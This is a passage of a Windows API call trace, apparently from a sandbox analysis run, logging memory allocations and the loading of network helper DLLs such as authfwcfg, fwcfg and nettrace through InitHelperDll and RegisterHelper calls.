[0136.479] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x1cff6a69990 [0136.479] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1cff6a61460 [0136.479] malloc (_Size=0x100) returned 0x1cff6a46de0 [0136.480] __dllonexit () returned 0x7ffe5f5a1200 [0136.480] __dllonexit () returned 0x7ffe5f5a11f0 [0136.481] __dllonexit () returned 0x7ffe5f5a1240 [0136.481] __dllonexit () returned 0x7ffe5f5a12a0 [0136.481] __dllonexit () returned 0x7ffe5f5a1390 [0136.481] __dllonexit () returned 0x7ffe5f5a13a0 [0136.481] __dllonexit () returned 0x7ffe5f5a1420 [0136.481] __dllonexit () returned 0x7ffe5f5a14c0 [0136.481] __dllonexit () returned 0x7ffe5f5a12c0 [0136.481] __dllonexit () returned 0x7ffe5f5c59c0 [0136.481] __dllonexit () returned 0x7ffe5f5a12e0 [0136.481] __dllonexit () returned 0x7ffe5f5a1470 [0136.482] __dllonexit () returned 0x7ffe5f5a1490 [0136.482] __dllonexit () returned 0x7ffe5f5a14e0 [0136.482] __dllonexit () returned 0x7ffe5f5a1500 [0136.482] __dllonexit () returned 0x7ffe5f5a1520 [0136.482] __dllonexit () returned 0x7ffe5f5a1550 [0136.482] __dllonexit () returned 0x7ffe5f5a1610 [0136.482] __dllonexit () returned 0x7ffe5f5a1050 [0136.482] __dllonexit () returned 0x7ffe5f5a1070 [0136.482] __dllonexit () returned 0x7ffe5f5a1030 [0136.489] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc154 [0136.490] __dllonexit () returned 0x7ffe5f5c59a0 [0136.490] __dllonexit () returned 0x7ffe5f5c5980 [0136.490] __dllonexit () returned 0x7ffe5f5c59b0 [0136.490] __dllonexit () returned 0x7ffe5f5c5990 [0136.490] GetVersion () returned 0x3ad7000a [0136.490] GetVersion () returned 0x3ad7000a [0136.490] GetVersion () returned 0x3ad7000a [0136.490] __dllonexit () returned 0x7ffe5f5b28e0 [0136.491] __dllonexit () returned 0x7ffe5f5b2910 [0136.491] __dllonexit () returned 0x7ffe5f5a1300 [0136.491] __dllonexit () returned 0x7ffe5f5a13b0 [0136.491] __dllonexit () returned 0x7ffe5f5a13d0 [0136.491] __dllonexit () returned 0x7ffe5f5b26e0 [0136.491] GetVersion () returned 0x3ad7000a [0136.491] GetProcessVersion (ProcessId=0x0) returned 0xa0000 [0136.491] GetSystemMetrics (nIndex=11) returned 32 [0136.491] GetSystemMetrics (nIndex=12) returned 32 [0136.491] GetSystemMetrics (nIndex=2) returned 17 [0136.491] GetSystemMetrics (nIndex=3) returned 17 [0136.491] GetDC (hWnd=0x0) returned 0x60100ce [0136.491] GetDeviceCaps (hdc=0x60100ce, index=88) returned 96 [0136.491] GetDeviceCaps (hdc=0x60100ce, index=90) returned 96 [0136.492] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0136.492] GetSysColor (nIndex=15) returned 0xf0f0f0 [0136.492] GetSysColor (nIndex=16) returned 0xa0a0a0 [0136.492] GetSysColor (nIndex=20) returned 0xffffff [0136.492] GetSysColor (nIndex=18) returned 0x0 [0136.492] GetSysColor (nIndex=6) returned 0x646464 [0136.492] GetSysColorBrush (nIndex=15) returned 0x100072 [0136.492] GetSysColorBrush (nIndex=6) returned 0x10007a [0136.492] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0136.492] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0136.492] __dllonexit () returned 0x7ffe5f5a1450 [0136.492] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc153 [0136.492] __dllonexit () returned 0x7ffe5f5b26c0 [0136.492] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0136.492] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0136.492] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0136.492] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0136.492] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0136.492] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0136.492] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0136.492] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0136.493] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0136.493] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0136.493] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc07a [0136.493] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc083 [0136.493] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc153 [0136.493] __dllonexit () returned 0x7ffe5f5c59d0 [0136.493] __dllonexit () returned 0x7ffe5f5c59f0 [0136.493] __dllonexit () returned 0x7ffe5f5c5a00 [0136.494] __dllonexit () returned 0x7ffe5f5c5a10 [0136.494] __dllonexit () returned 0x7ffe5f5c5a20 [0136.494] GetCursorPos (in: lpPoint=0x7ffe5f6e5ae8 | out: lpPoint=0x7ffe5f6e5ae8*(x=40, y=863)) returned 1 [0136.494] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x1cff6a71f60 [0136.494] LocalReAlloc (hMem=0x1cff6a61460, uBytes=0x18, uFlags=0x2) returned 0x1cff6a55390 [0136.494] GetCurrentThread () returned 0xfffffffffffffffe [0136.494] GetCurrentThreadId () returned 0xf9c [0136.494] __dllonexit () returned 0x7ffe5f5a1620 [0136.494] SetErrorMode (uMode=0x0) returned 0x8001 [0136.495] SetErrorMode (uMode=0x8001) returned 0x0 [0136.495] GetModuleFileNameW (in: hModule=0x7ffe5f5a0000, lpFilename=0x3e092f6800, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0136.495] wcscpy_s (in: _Destination=0x3e092f6a10, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0136.495] FindResourceW (hModule=0x7ffe5f5a0000, lpName=0xe01, lpType=0x6) returned 0x1cff84d0bb0 [0136.498] LoadStringW (in: hInstance=0x7ffe5f5a0000, uID=0xe000, lpBuffer=0x3e092f6c20, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0136.498] wcscpy_s (in: _Destination=0x3e092f6834, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0136.498] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0136.500] malloc (_Size=0x80) returned 0x1cff6a46e00 [0136.500] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x1cff6a73130 [0136.500] GetSystemDirectoryA (in: lpBuffer=0x3e092f6ea0, uSize=0x112 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0136.500] strcat_s (in: _Destination="C:\\WINDOWS\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\WINDOWS\\system32\\MFC42") returned 0x0 [0136.500] strcat_s (in: _Destination="C:\\WINDOWS\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\WINDOWS\\system32\\MFC42LOC") returned 0x0 [0136.500] strcat_s (in: _Destination="C:\\WINDOWS\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\WINDOWS\\system32\\MFC42LOC.DLL") returned 0x0 [0136.500] LoadLibraryExA (lpLibFileName="C:\\WINDOWS\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0136.503] GetProcAddress (hModule=0x7ffe5ff60000, lpProcName="InitHelperDll") returned 0x7ffe5ff75850 [0136.503] InitHelperDll () returned 0x0 [0136.504] RegisterHelper () returned 0x0 [0136.504] GetProcessHeap () returned 0x1cff6a50000 [0136.504] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x160) returned 0x1cff6a6ac20 [0136.505] GetProcessHeap () returned 0x1cff6a50000 [0136.505] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a542e0) returned 1 [0136.505] RegisterHelper () returned 0x0 [0136.505] GetProcessHeap () returned 0x1cff6a50000 [0136.505] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1b8) returned 0x1cff6a6ce70 [0136.505] GetProcessHeap () returned 0x1cff6a50000 [0136.505] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a6ac20) returned 1 [0136.506] RegisterHelper () returned 0x0 [0136.506] GetProcessHeap () returned 0x1cff6a50000 [0136.506] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x210) returned 0x1cff6a6ac20 [0136.506] GetProcessHeap () returned 0x1cff6a50000 [0136.506] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a6ce70) returned 1 [0136.506] RegisterHelper () returned 0x0 [0136.507] GetProcessHeap () returned 0x1cff6a50000 [0136.507] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x268) returned 0x1cff6a6ce70 [0136.507] GetProcessHeap () returned 0x1cff6a50000 [0136.507] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a6ac20) returned 1 [0136.507] RegisterHelper () returned 0x0 [0136.507] GetProcessHeap () returned 0x1cff6a50000 [0136.507] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x2c0) returned 0x1cff6a75240 [0136.507] GetProcessHeap () returned 0x1cff6a50000 [0136.507] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a6ce70) returned 1 [0136.507] RegEnumValueW (in: hKey=0xb4, dwIndex=0x2, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="authfwcfg", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.507] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0136.507] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0136.507] GetProcessHeap () returned 0x1cff6a50000 [0136.507] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xa0) returned 0x1cff6a552d0 [0136.507] GetProcessHeap () returned 0x1cff6a50000 [0136.507] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x14) returned 0x1cff6a60da0 [0136.507] GetProcessHeap () returned 0x1cff6a50000 [0136.507] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1c) returned 0x1cff6a69540 [0136.507] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0136.507] GetProcessHeap () returned 0x1cff6a50000 [0136.507] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a55030) returned 1 [0136.507] LoadLibraryExW (lpLibFileName="AUTHFWCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe5f450000 [0136.550] GetProcAddress (hModule=0x7ffe5f450000, lpProcName="InitHelperDll") returned 0x7ffe5f451430 [0136.550] InitHelperDll () returned 0x0 [0136.554] RegisterHelper () returned 0x0 [0136.554] GetProcessHeap () returned 0x1cff6a50000 [0136.554] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x318) returned 0x1cff6a6ce70 [0136.554] GetProcessHeap () returned 0x1cff6a50000 [0136.554] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a75240) returned 1 [0136.554] RegisterHelper () returned 0x0 [0136.554] GetProcessHeap () returned 0x1cff6a50000 [0136.554] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x370) returned 0x1cff6a75d20 [0136.554] GetProcessHeap () returned 0x1cff6a50000 [0136.554] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a6ce70) returned 1 [0136.554] RegisterHelper () returned 0x0 [0136.554] GetProcessHeap () returned 0x1cff6a50000 [0136.555] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x3c8) returned 0x1cff6a6ce70 [0136.555] GetProcessHeap () returned 0x1cff6a50000 [0136.555] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a75d20) returned 1 [0136.555] RegisterHelper () returned 0x0 [0136.555] GetProcessHeap () returned 0x1cff6a50000 [0136.555] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x420) returned 0x1cff6a75d20 [0136.555] GetProcessHeap () returned 0x1cff6a50000 [0136.555] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a6ce70) returned 1 [0136.555] RegisterHelper () returned 0x0 [0136.555] GetProcessHeap () returned 0x1cff6a50000 [0136.555] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x478) returned 0x1cff6a6ce70 [0136.555] GetProcessHeap () returned 0x1cff6a50000 [0136.555] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a75d20) returned 1 [0136.555] RegEnumValueW (in: hKey=0xb4, dwIndex=0x3, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="dhcpclient", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.555] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0136.555] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0136.555] GetProcessHeap () returned 0x1cff6a50000 [0136.555] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc8) returned 0x1cff6a689a0 [0136.555] GetProcessHeap () returned 0x1cff6a50000 [0136.555] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x16) returned 0x1cff6a75aa0 [0136.555] GetProcessHeap () returned 0x1cff6a50000 [0136.555] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x22) returned 0x1cff6a69570 [0136.555] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0136.555] GetProcessHeap () returned 0x1cff6a50000 [0136.555] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a552d0) returned 1 [0136.555] LoadLibraryExW (lpLibFileName="DHCPCMONITOR.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe62b60000 [0136.568] GetProcAddress (hModule=0x7ffe62b60000, lpProcName="InitHelperDll") returned 0x7ffe62b61610 [0136.568] InitHelperDll () returned 0x0 [0136.568] RegisterHelper () returned 0x0 [0136.568] GetProcessHeap () returned 0x1cff6a50000 [0136.568] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x4d0) returned 0x1cff6a76530 [0136.568] GetProcessHeap () returned 0x1cff6a50000 [0136.568] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a6ce70) returned 1 [0136.568] RegEnumValueW (in: hKey=0xb4, dwIndex=0x4, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="dot3cfg", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.568] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0136.568] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0136.568] GetProcessHeap () returned 0x1cff6a50000 [0136.568] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xf0) returned 0x1cff6a542e0 [0136.568] GetProcessHeap () returned 0x1cff6a50000 [0136.568] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a75ca0 [0136.568] GetProcessHeap () returned 0x1cff6a50000 [0136.568] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a75860 [0136.568] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0136.568] GetProcessHeap () returned 0x1cff6a50000 [0136.568] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a689a0) returned 1 [0136.568] LoadLibraryExW (lpLibFileName="DOT3CFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe62970000 [0136.639] GetProcAddress (hModule=0x7ffe62970000, lpProcName="InitHelperDll") returned 0x7ffe62971100 [0136.639] InitHelperDll () returned 0x0 [0136.639] RegisterHelper () returned 0x0 [0136.639] GetProcessHeap () returned 0x1cff6a50000 [0136.639] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x528) returned 0x1cff6a77220 [0136.639] GetProcessHeap () returned 0x1cff6a50000 [0136.639] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a76530) returned 1 [0136.639] RegEnumValueW (in: hKey=0xb4, dwIndex=0x5, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="fwcfg", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.640] _wcsicmp (_String1="fwcfg.dll", _String2="ipxmontr.dll") returned -3 [0136.640] _wcsicmp (_String1="fwcfg.dll", _String2="ipxpromn.dll") returned -3 [0136.640] GetProcessHeap () returned 0x1cff6a50000 [0136.640] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x118) returned 0x1cff6a6ac20 [0136.640] GetProcessHeap () returned 0x1cff6a50000 [0136.640] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc) returned 0x1cff6a75640 [0136.640] GetProcessHeap () returned 0x1cff6a50000 [0136.640] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x14) returned 0x1cff6a759e0 [0136.640] _wcsupr (in: _String="fwcfg.dll" | out: _String="FWCFG.DLL") returned="FWCFG.DLL" [0136.640] GetProcessHeap () returned 0x1cff6a50000 [0136.640] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a542e0) returned 1 [0136.640] LoadLibraryExW (lpLibFileName="FWCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe5fa60000 [0136.652] GetProcAddress (hModule=0x7ffe5fa60000, lpProcName="InitHelperDll") returned 0x7ffe5fa611f0 [0136.652] InitHelperDll () returned 0x0 [0136.652] RegisterHelper () returned 0x0 [0136.652] GetProcessHeap () returned 0x1cff6a50000 [0136.652] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x580) returned 0x1cff6a77750 [0136.652] GetProcessHeap () returned 0x1cff6a50000 [0136.652] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a77220) returned 1 [0136.652] RegEnumValueW (in: hKey=0xb4, dwIndex=0x6, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="hnetmon", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.652] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0136.652] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0136.652] GetProcessHeap () returned 0x1cff6a50000 [0136.652] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x140) returned 0x1cff6a752c0 [0136.652] GetProcessHeap () returned 0x1cff6a50000 [0136.652] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a75600 [0136.652] GetProcessHeap () returned 0x1cff6a50000 [0136.653] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a75b20 [0136.653] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0136.653] GetProcessHeap () returned 0x1cff6a50000 [0136.653] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a6ac20) returned 1 [0136.653] LoadLibraryExW (lpLibFileName="HNETMON.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe62b50000 [0136.737] GetProcAddress (hModule=0x7ffe62b50000, lpProcName="InitHelperDll") returned 0x7ffe62b52060 [0136.737] InitHelperDll () returned 0x0 [0136.737] RegisterHelper () returned 0x0 [0136.737] GetProcessHeap () returned 0x1cff6a50000 [0136.737] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x5d8) returned 0x1cff6a7f810 [0136.737] GetProcessHeap () returned 0x1cff6a50000 [0136.737] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a77750) returned 1 [0136.737] RegEnumValueW (in: hKey=0xb4, dwIndex=0x7, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="netiohlp", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.737] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0136.737] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0136.737] GetProcessHeap () returned 0x1cff6a50000 [0136.737] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x168) returned 0x1cff6a6ac20 [0136.737] GetProcessHeap () returned 0x1cff6a50000 [0136.737] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x12) returned 0x1cff6a75ac0 [0136.737] GetProcessHeap () returned 0x1cff6a50000 [0136.737] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1a) returned 0x1cff6a76340 [0136.737] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0136.737] GetProcessHeap () returned 0x1cff6a50000 [0136.737] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a752c0) returned 1 [0136.737] LoadLibraryExW (lpLibFileName="NETIOHLP.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe5fa00000 [0136.757] GetProcAddress (hModule=0x7ffe5fa00000, lpProcName="InitHelperDll") returned 0x7ffe5fa15f80 [0136.757] InitHelperDll () returned 0x0 [0136.757] RegisterHelper () returned 0x0 [0136.757] GetProcessHeap () returned 0x1cff6a50000 [0136.757] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x630) returned 0x1cff6a77750 [0136.757] GetProcessHeap () returned 0x1cff6a50000 [0136.757] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a7f810) returned 1 [0136.758] RegisterHelper () returned 0x0 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x688) returned 0x1cff6a81610 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a77750) returned 1 [0136.758] RegisterHelper () returned 0x0 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x6e0) returned 0x1cff6a77750 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a81610) returned 1 [0136.758] RegisterHelper () returned 0x0 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x738) returned 0x1cff6a81610 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a77750) returned 1 [0136.758] RegisterHelper () returned 0x0 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x790) returned 0x1cff6a77750 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a81610) returned 1 [0136.758] RegisterHelper () returned 0x0 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x7e8) returned 0x1cff6a81610 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a77750) returned 1 [0136.758] RegisterHelper () returned 0x0 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x840) returned 0x1cff6a81e00 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a81610) returned 1 [0136.758] RegisterHelper () returned 0x0 [0136.758] GetProcessHeap () returned 0x1cff6a50000 [0136.758] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x898) returned 0x1cff6a82650 [0136.759] GetProcessHeap () returned 0x1cff6a50000 [0136.759] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a81e00) returned 1 [0136.759] RegisterHelper () returned 0x0 [0136.759] GetProcessHeap () returned 0x1cff6a50000 [0136.759] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8f0) returned 0x1cff6a81610 [0136.759] GetProcessHeap () returned 0x1cff6a50000 [0136.759] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a82650) returned 1 [0136.759] RegEnumValueW (in: hKey=0xb4, dwIndex=0x8, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="nettrace", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.759] _wcsicmp (_String1="nettrace.dll", _String2="ipxmontr.dll") returned 5 [0136.759] _wcsicmp (_String1="nettrace.dll", _String2="ipxpromn.dll") returned 5 [0136.759] GetProcessHeap () returned 0x1cff6a50000 [0136.759] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x190) returned 0x1cff6a752c0 [0136.759] GetProcessHeap () returned 0x1cff6a50000 [0136.759] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x12) returned 0x1cff6a757a0 [0136.759] GetProcessHeap () returned 0x1cff6a50000 [0136.759] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1a) returned 0x1cff6a800b0 [0136.759] _wcsupr (in: _String="nettrace.dll" | out: _String="NETTRACE.DLL") returned="NETTRACE.DLL" [0136.759] GetProcessHeap () returned 0x1cff6a50000 [0136.759] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a6ac20) returned 1 [0136.759] LoadLibraryExW (lpLibFileName="NETTRACE.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe5ed60000 [0136.835] GetProcAddress (hModule=0x7ffe5ed60000, lpProcName="InitHelperDll") returned 0x7ffe5ed615d0 [0136.835] InitHelperDll () returned 0x0 [0136.835] RegisterHelper () returned 0x0 [0136.835] GetProcessHeap () returned 0x1cff6a50000 [0136.835] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x948) returned 0x1cff6a98030 [0136.835] GetProcessHeap () returned 0x1cff6a50000 [0136.835] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a81610) returned 1 [0136.835] RegEnumValueW (in: hKey=0xb4, dwIndex=0x9, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, 